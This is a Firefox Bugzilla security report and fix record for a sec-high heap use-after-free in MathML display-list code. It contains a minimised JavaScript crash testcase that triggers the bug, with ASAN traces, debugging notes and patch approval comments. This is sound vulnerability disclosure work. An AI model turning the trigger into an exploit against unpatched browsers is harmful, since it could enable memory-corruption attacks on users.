Closed Bug 1417010 Opened 7 years ago Closed 7 years ago

heap-use-after-free in nsDisplayMathMLCharForeground::GetBounds

Categories

(Core :: MathML, defect)

Product:
Core
Component:
MathML
Version:
59 Branch
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
VERIFIED FIXED
Milestone:
mozilla59
Tracking Flags:
Tracking Status
firefox-esr52 --- unaffected
firefox57 --- unaffected
firefox58 --- verified
firefox59 --- verified

People

(Reporter: nils, Assigned: mattwoodrow)

References

Details

(4 keywords, Whiteboard: [post-critsmash-triage])

Attachments

(3 files)

crash.html (minimised testcase)
686 bytes, text/html
Details
ASAN output
21.19 KB, text/plain
Details
invalidate-mathml-items
1.71 KB, patch
mikokm
: review+
Sylvestre
: approval-mozilla-beta+
Details | Diff | Splinter Review
The following testcase crashes the latest ASAN build of Firefox 59.0a1 (SourceStamp=e1d7427787f7a26983c92ea1a1ac99eb863edd6c) crash.html: <script> function spin () { var x=new XMLHttpRequest(); x.open("POST","https://mozilla.org",false); try{x.send("X");}catch(e){} } function start() { window.setTimeout(fun0, 100); } function fun0() { o274=document.createElementNS('http://www.w3.org/1998/Math/MathML','math'); o275=document.createElementNS('http://www.w3.org/1998/Math/MathML','mo'); o274.appendChild(o275); o276=document.createElementNS('http://www.w3.org/1998/Math/MathML','mfenced'); o275.appendChild(o276); document.body.appendChild(o274); spin(); o290=function() {let x=document.querySelectorAll('*:not([id])');return x[x.length-1]}(); o290.id='id3'; } </script> <body onload="start()"></body> ASAN output: ================================================================= ==15101==ERROR: AddressSanitizer: heap-use-after-free on address 0x6110002c0290 at pc 0x7f9c8868cf52 bp 0x7fff74fc05c0 sp 0x7fff74fc05b8 READ of size 4 at 0x6110002c0290 thread T0 (file:// Content) #0 0x7f9c8868cf51 in GetRect /builds/worker/workspace/build/src/layout/mathml/nsMathMLChar.h:155:11 #1 0x7f9c8868cf51 in nsDisplayMathMLCharForeground::GetBounds(nsDisplayListBuilder*, bool*) const /builds/worker/workspace/build/src/layout/mathml/nsMathMLChar.cpp:1885 #2 0x7f9c88714ef4 in GetClippedBounds /builds/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:3099:14 #3 0x7f9c88714ef4 in nsDisplayList::GetClippedBoundsWithRespectToASR(nsDisplayListBuilder*, mozilla::ActiveScrolledRoot const*, nsRect*) const /builds/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:2180 #4 0x7f9c8871085e in mozilla::FrameLayerBuilder::BuildContainerLayerFor(nsDisplayListBuilder*, mozilla::layers::LayerManager*, nsIFrame*, nsDisplayItem*, nsDisplayList*, mozilla::ContainerLayerParameters const&, mozilla::gfx::Matrix4x4Typed<mozilla::gfx::UnknownUnits, mozilla::gfx::UnknownUnits> const*, unsigned int) /builds/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:5623:30 #5 0x7f9c88798780 in nsDisplayList::PaintRoot(nsDisplayListBuilder*, gfxContext*, unsigned int) /builds/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:2477:9 #6 0x7f9c87f6a581 in nsLayoutUtils::PaintFrame(gfxContext*, nsIFrame*, nsRegion const&, unsigned int, nsDisplayListBuilderMode, nsLayoutUtils::PaintFrameFlags) /builds/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3916:12 #7 0x7f9c87e60674 in mozilla::PresShell::Paint(nsView*, nsRegion const&, unsigned int) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:6468:5 #8 0x7f9c876217f6 in nsViewManager::ProcessPendingUpdatesPaint(nsIWidget*) /builds/worker/workspace/build/src/view/nsViewManager.cpp:480:19 #9 0x7f9c8762069b in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) /builds/worker/workspace/build/src/view/nsViewManager.cpp:412:33 #10 0x7f9c87623ed5 in nsViewManager::ProcessPendingUpdates() /builds/worker/workspace/build/src/view/nsViewManager.cpp:1102:5 #11 0x7f9c87dbeee3 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2047:11 #12 0x7f9c87dca41b in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:336:13 #13 0x7f9c87dca41b in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:306 #14 0x7f9c87dca116 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:328:5 #15 0x7f9c87dcc66b in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:769:5 #16 0x7f9c87dcc66b in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:682 #17 0x7f9c87dcc276 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:583:9 #18 0x7f9c88620d72 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:68:16 #19 0x7f9c821819a1 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20 #20 0x7f9c8204cde5 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1815:28 #21 0x7f9c81ca2269 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2119:25 #22 0x7f9c81c9f27f in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2049:17 #23 0x7f9c81ca09b4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1895:5 #24 0x7f9c81ca1008 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1928:15 #25 0x7f9c80edb616 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14 #26 0x7f9c80ef5ad8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10 #27 0x7f9c81ca9ec6 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:125:5 #28 0x7f9c81c0a6bb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10 #29 0x7f9c81c0a6bb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319 #30 0x7f9c81c0a6bb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299 #31 0x7f9c876a26cf in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:159:27 #32 0x7f9c8b9d9627 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22 #33 0x7f9c81c0a6bb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10 #34 0x7f9c81c0a6bb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319 #35 0x7f9c81c0a6bb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299 #36 0x7f9c8b9d8fda in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34 #37 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30 #38 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280 #39 0x7f9c9e6a982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #40 0x41dbc8 in _start (/fuzzer3/firefox/firefox+0x41dbc8) 0x6110002c0290 is located 16 bytes inside of 200-byte region [0x6110002c0280,0x6110002c0348) freed by thread T0 (file:// Content) here: #0 0x4bc0fb in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3 #1 0x7f9c88661930 in operator delete /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:230:12 #2 0x7f9c88661930 in nsMathMLmfencedFrame::RemoveFencesAndSeparators() /builds/worker/workspace/build/src/layout/mathml/nsMathMLmfencedFrame.cpp:86 #3 0x7f9c886631f1 in nsMathMLmfencedFrame::AttributeChanged(int, nsAtom*, int) /builds/worker/workspace/build/src/layout/mathml/nsMathMLmfencedFrame.cpp:67:3 #4 0x7f9c87e8ad30 in mozilla::ServoRestyleManager::AttributeChanged(mozilla::dom::Element*, int, nsAtom*, int, nsAttrValue const*) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1445:19 #5 0x7f9c87e4baa4 in AttributeChanged /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:72:3 #6 0x7f9c87e4baa4 in mozilla::PresShell::AttributeChanged(nsIDocument*, mozilla::dom::Element*, int, nsAtom*, int, nsAttrValue const*) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4381 #7 0x7f9c83e01b07 in nsNodeUtils::AttributeChanged(mozilla::dom::Element*, int, nsAtom*, int, nsAttrValue const*) /builds/worker/workspace/build/src/dom/base/nsNodeUtils.cpp:146:3 #8 0x7f9c83ab57b1 in mozilla::dom::Element::SetAttrAndNotify(int, nsAtom*, nsAtom*, nsAttrValue const*, nsAttrValue&, nsIPrincipal*, unsigned char, bool, bool, bool, nsIDocument*, mozAutoDocUpdate const&) /builds/worker/workspace/build/src/dom/base/Element.cpp:2813:5 #9 0x7f9c83ab71d5 in mozilla::dom::Element::SetAttr(int, nsAtom*, nsAtom*, nsTSubstring<char16_t> const&, nsIPrincipal*, bool) /builds/worker/workspace/build/src/dom/base/Element.cpp:2637:10 #10 0x7f9c853408d4 in SetAttr /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIContent.h:380:12 #11 0x7f9c853408d4 in SetAttr /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIContent.h:375 #12 0x7f9c853408d4 in SetId /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:891 #13 0x7f9c853408d4 in mozilla::dom::ElementBinding::set_id(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Element*, JSJitSetterCallArgs) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:781 #14 0x7f9c8584282a in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3001:8 #15 0x7f9c8bc83a90 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15 #16 0x7f9c8bc83a90 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473 #17 0x7f9c8bc861e0 in InternalCall /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:12 #18 0x7f9c8bc861e0 in Call /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541 #19 0x7f9c8bc861e0 in js::CallSetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:670 #20 0x7f9c8cc18399 in SetExistingProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<js::NativeObject*>, JS::Handle<JS::PropertyResult>, JS::ObjectOpResult&) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2729:10 #21 0x7f9c8cc10cac in bool js::NativeSetProperty<(js::QualifiedBool)1>(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2757:20 #22 0x7f9c8bc68d14 in SetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1633:12 #23 0x7f9c8bc68d14 in SetPropertyOperation /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:270 #24 0x7f9c8bc68d14 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2895 #25 0x7f9c8bc5705a in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12 #26 0x7f9c8bc83b8f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15 #27 0x7f9c8bc84a82 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10 #28 0x7f9c8c6c9ecb in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3032:12 #29 0x7f9c853b6dc9 in mozilla::dom::Function::Call(JSContext*, JS::Handle<JS::Value>, nsTArray<JS::Value> const&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36:8 #30 0x7f9c839e518b in Call<nsCOMPtr<nsISupports> > /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FunctionBinding.h:72:12 #31 0x7f9c839e518b in nsGlobalWindow::RunTimeoutHandler(mozilla::dom::Timeout*, nsIScriptContext*) /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13242 #32 0x7f9c83bc458d in mozilla::dom::TimeoutManager::RunTimeout(mozilla::TimeStamp const&, mozilla::TimeStamp const&) /builds/worker/workspace/build/src/dom/base/TimeoutManager.cpp:878:42 #33 0x7f9c83bb8550 in mozilla::dom::TimeoutExecutor::MaybeExecute() /builds/worker/workspace/build/src/dom/base/TimeoutExecutor.cpp:171:11 #34 0x7f9c83bb8da6 in Notify /builds/worker/workspace/build/src/dom/base/TimeoutExecutor.cpp:239:5 #35 0x7f9c83bb8da6 in non-virtual thunk to mozilla::dom::TimeoutExecutor::Notify(nsITimer*) /builds/worker/workspace/build/src/dom/base/TimeoutExecutor.cpp:234 #36 0x7f9c80efa950 in nsTimerImpl::Fire(int) /builds/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:704:40 #37 0x7f9c80ecc8e6 in nsTimerEvent::Run() /builds/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:286:11 #38 0x7f9c80eeb2a2 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /builds/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:193:22 #39 0x7f9c80eeae0f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /builds/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:79:15 #40 0x7f9c80eb5d21 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25 #41 0x7f9c80edb616 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14 previously allocated by thread T0 (file:// Content) here: #0 0x4bc44c in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3 #1 0x4ed85d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17 #2 0x7f9c8866222e in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12 #3 0x7f9c8866222e in nsMathMLmfencedFrame::CreateFencesAndSeparators(nsPresContext*) /builds/worker/workspace/build/src/layout/mathml/nsMathMLmfencedFrame.cpp:110 #4 0x7f9c88661e8f in nsMathMLmfencedFrame::InheritAutomaticData(nsIFrame*) /builds/worker/workspace/build/src/layout/mathml/nsMathMLmfencedFrame.cpp:40:3 #5 0x7f9c886630ff in non-virtual thunk to nsMathMLmfencedFrame::InheritAutomaticData(nsIFrame*) /builds/worker/workspace/build/src/layout/mathml/nsMathMLmfencedFrame.cpp:32:23 #6 0x7f9c88641bd0 in nsMathMLContainerFrame::RebuildAutomaticDataForChildren(nsIFrame*) /builds/worker/workspace/build/src/layout/mathml/nsMathMLContainerFrame.cpp:660:25 #7 0x7f9c88641bd8 in nsMathMLContainerFrame::RebuildAutomaticDataForChildren(nsIFrame*) /builds/worker/workspace/build/src/layout/mathml/nsMathMLContainerFrame.cpp:662:5 #8 0x7f9c87edb536 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4245:28 #9 0x7f9c87ee5b5b in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6384:3 #10 0x7f9c87ec3ed6 in nsCSSFrameConstructor::ConstructFramesFromItemList(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList&, nsContainerFrame*, bool, nsFrameItems&) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10958:5 #11 0x7f9c87ef3fbc in nsCSSFrameConstructor::ContentAppended(nsIContent*, nsIContent*, nsCSSFrameConstructor::InsertionKind, TreeMatchContext*) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7811:3 #12 0x7f9c87e14385 in mozilla::RestyleManager::ProcessRestyledFrames(nsStyleChangeList&) /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:1414:27 #13 0x7f9c87e8920a in mozilla::ServoRestyleManager::DoProcessPendingRestyles(mozilla::ServoTraversalFlags) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1159:9 #14 0x7f9c87e4872f in ProcessPendingRestyles /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1235:3 #15 0x7f9c87e4872f in ProcessPendingRestyles /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:44 #16 0x7f9c87e4872f in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4193 #17 0x7f9c87dbcee8 in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:579:5 #18 0x7f9c87dbcee8 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1882 #19 0x7f9c87dca41b in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:336:13 #20 0x7f9c87dca41b in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:306 #21 0x7f9c87dca116 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:328:5 #22 0x7f9c87dcc66b in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:769:5 #23 0x7f9c87dcc66b in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:682 #24 0x7f9c87dcc276 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:583:9 #25 0x7f9c88620d72 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:68:16 #26 0x7f9c821819a1 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20 #27 0x7f9c8204cde5 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1815:28 #28 0x7f9c81ca2269 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2119:25 #29 0x7f9c81c9f27f in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2049:17 #30 0x7f9c81ca09b4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1895:5 #31 0x7f9c81ca1008 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1928:15 #32 0x7f9c80edb616 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14 #33 0x7f9c80ef5ad8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10 #34 0x7f9c874ceaa7 in SpinEventLoopUntil<mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3110:31)> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:323:25 #35 0x7f9c874ceaa7 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3110 #36 0x7f9c874d0315 in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, mozilla::dom::Nullable<mozilla::dom::DocumentOrBlobOrArrayBufferViewOrArrayBufferOrFormDataOrURLSearchParamsOrUSVString> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2939:11 SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/layout/mathml/nsMathMLChar.h:155:11 in GetRect Shadow bytes around the buggy address: 0x0c2280050000: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c2280050010: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c2280050020: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c2280050030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c2280050040: fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c2280050050: fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c2280050060: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa 0x0c2280050070: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c2280050080: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c2280050090: fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c22800500a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==15101==ABORTING
Attached file ASAN output
Group: core-security → layout-core-security
Matt, do you know who might be able to investigate this? Thanks.
Flags: needinfo?(matt.woodrow)
I haven't been able to reproduce these crashes with a non-ASAN build yet. Nils, were there any extra prefs that need setting for this?
Flags: needinfo?(nils)
Assignee: nobody → matt.woodrow
Flags: needinfo?(matt.woodrow)
I've looked briefly at this in 'rr'. It appears we access a deleted nsMathMLChar, which was deleted here: #0 nsMathMLmfencedFrame::RemoveFencesAndSeparators layout/mathml/nsMathMLmfencedFrame.cpp:86 #1 nsMathMLmfencedFrame::AttributeChanged #2 mozilla::ServoRestyleManager::AttributeChanged #3 mozilla::RestyleManager::AttributeChanged #4 mozilla::PresShell::AttributeChanged #5 non-virtual thunk to mozilla::PresShell::AttributeChanged #6 nsNodeUtils::AttributeChanged #7 mozilla::dom::Element::SetAttrAndNotify #8 mozilla::dom::Element::SetAttr (rr) list 81 } 82 83 void 84 nsMathMLmfencedFrame::RemoveFencesAndSeparators() 85 { 86 delete mOpenChar; 87 delete mCloseChar; 88 if (mSeparatorsChar) delete[] mSeparatorsChar; 89 90 mOpenChar = nullptr; (rr) p this->mOpenChar $29 = (nsMathMLChar *) 0x611000455a00 But apparently we still have a nsDisplayMathMLCharForeground which references it through its mChar member which is what ASAN catched: #3 in nsDisplayMathMLCharForeground::GetBounds 1885 mChar->GetRect(rect); (rr) p this->mChar $30 = (nsMathMLChar *) 0x611000455a00
Blocks: 1352499
(In reply to Ryan VanderMeulen [:RyanVM] from comment #3) > I haven't been able to reproduce these crashes with a non-ASAN build yet. > Nils, were there any extra prefs that need setting for this? I'm not sure, but this might be needed: user_pref("browser.rights.3.shown", true); (it was needed in another bug that used the same sync XHR trick) This crash in this bug is harder to reproduce though.
MathML display items can have a raw pointer to an nsMathML char, and then we delete it. We need to make sure we mark the display items as needing a rebuild before we try use them again.
Attachment #8929213 - Flags: review?(mikokm)
Comment on attachment 8929213 [details] [diff] [review] invalidate-mathml-items Review of attachment 8929213 [details] [diff] [review]: ----------------------------------------------------------------- LGTM.
Attachment #8929213 - Flags: review?(mikokm) → review+
Comment on attachment 8929213 [details] [diff] [review] invalidate-mathml-items [Security approval request comment] How easily could an exploit be constructed based on the patch? Somewhat easily, it's clear that we're invalidating something on an attribute change. Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem? The current commit message does, but I can strip that for landing. Which older supported branches are affected by this flaw? Only mozilla-central has retained-dl, and only for the last few days of Nightly. How likely is this patch to cause regressions; how much testing does it need? Very unlikely, shouldn't need extra testing.
Attachment #8929213 - Flags: sec-approval?
If this is Nightly only, then it doesn't need sec-approval.
Attachment #8929213 - Flags: sec-approval?
https://hg.mozilla.org/mozilla-central/rev/e8f8f2d0d64f
Status: NEW → RESOLVED
Closed: 7 years ago
status-firefox59: affectedfixed
Resolution: --- → FIXED
Target Milestone: --- → mozilla59
Comment on attachment 8929213 [details] [diff] [review] invalidate-mathml-items Approval Request Comment [Feature/Bug causing the regression]: bug 1352499. This is code that is preffed off, but we want to run a shield study enabling the pref. [User impact if declined]: None, preffed off code. [Is this code covered by automated tests?]: Yes, when the pref is enabled. [Has the fix been verified in Nightly?]: Yes [Needs manual test from QE? If yes, steps to reproduce]: No [List of other uplifts needed for the feature/fix]: None [Is the change risky?]: No [Why is the change risky/not risky?]: Code is preffed off. [String changes made/needed]: None
Attachment #8929213 - Flags: approval-mozilla-beta?
Comment on attachment 8929213 [details] [diff] [review] invalidate-mathml-items Fix a sec-high, taking it.
Attachment #8929213 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Group: layout-core-security → core-security-release
Flags: qe-verify+
Whiteboard: [post-critsmash-triage]
I managed to reproduce this issue on Firefox 59.0a1(2017-11-14) asan build, under Ubuntu 16.04x64. The issue is no longer reproducible on Firefox 58.0, or on Firefox 59.0a1(2018-01-17). Tests were performed under Ubuntu 16.04x64, Windows 10x64 and under macOS 10.12.6.
Status: RESOLVED → VERIFIED
status-firefox58: fixedverified
status-firefox59: fixedverified
Flags: qe-verify+
Flags: sec-bounty?
Group: core-security-release
Flags: sec-bounty? → sec-bounty+
Keywords: regression
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: